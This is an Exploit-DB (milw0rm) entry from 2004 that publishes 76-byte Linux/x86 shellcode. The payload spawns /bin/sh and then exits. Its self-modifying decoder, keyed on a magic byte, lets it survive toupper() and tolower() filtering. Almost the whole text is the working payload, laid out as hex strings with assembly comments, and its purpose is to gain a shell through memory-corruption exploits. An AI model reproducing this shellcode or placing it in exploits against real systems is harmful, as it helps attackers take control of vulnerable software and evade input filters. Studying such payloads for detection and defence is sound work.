Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)

EDB-ID:

13421

CVE:

N/A


Author:

xort


Platform:

Linux_x86

Date:

2004-12-22


/*-------------------------------------------------------*/
/*     Magic Byte Self Modifying Code for surviving      */
/*               toupper() & tolower()                   */
/*        76bytes execve() _exit() code by XORt          */
/*-------------------------------------------------------*/
"\xeb\x34"               /* jmp $0x34          [revert]  */
"\x5e"                   /* pop %esi                     */
/*--set-up-variables-------------------------------------*/
"\x89\xf7"               /* mov %esi, %edi               */
"\x83\xef\x22"           /* sub $0x22, %edi              */
"\x31\xc9"               /* xor %ecx, %ecx               */
"\xb1\x8c"               /* mov $0x8c, %cl               */
"\xd1\xc9"               /* ror $0x1, %ecx    (70loops)  */
/*-scan-for-magic-byte-----------------------------------*/
"\xb0\x7b"               /* mov $0x7b, %al               */
"\xf2\xae"               /* repne scasb                  */
"\xff\xcf"               /* dec %edi                     */
"\xac"                   /* lodsb            (al=DS:SI)  */
"\x28\x07"               /* subb %al, (%edi)             */
/*--loop-back-to-scanner---------------------------------*/
"\xe2\xf5"               /* loop -$0xe      [load-byte]  */
/*-------------------------------------[length:25bytes]--*/
//                                                       //
/*--modified-shellcode-----------------------------------*/
"\x89\x7b\x08"           /* movl %esi, 0x8(%esi)        @*/
"\x91"                   /* xchg %eax, %ecx              */
"\x88\x7b\x07"           /* movb %al, 0x7(%esi)         @*/
"\x89\x7b\x0c"           /* movl %eax, 0xc(%esi)        @*/
"\xb0\x0b"               /* movb $0xb, %al               */
"\x89\xf3"               /* movl %esi, %ebx              */
"\x8d\x7b\x08"           /* leal 0x8(%esi), %ecx        @*/
"\x8d\x7b\x0c"           /* leal 0xc(%esi), %edx        @*/
"\xcd\x80"               /* int $0x80                    */
"\x31\xdb"               /* xorl %ebx, %ebx              */
"\x89\xd8"               /* movl %ebx, %eax              */
"\x40"                   /* inc %eax                     */
"\xcd\x80"               /* int $0x80                    */
/*--revert-----------------------------------------------*/
"\xe8\xc7\xff\xff\xff"   /* call -$0x39                  */
/*--offset-table-----------------------------------------*/
"\x05\x35\x35\x2d\x25\x19\x12\x0d\x08\x13"             /**/
/*--string-to-run----------------------------------------*/
"/\x7b\x7b\x7b/\x7b\x7b" /* .string "/bin/sh"            */
/*--------------------------------------[length:51bytes]-*/


// milw0rm.com [2004-12-22]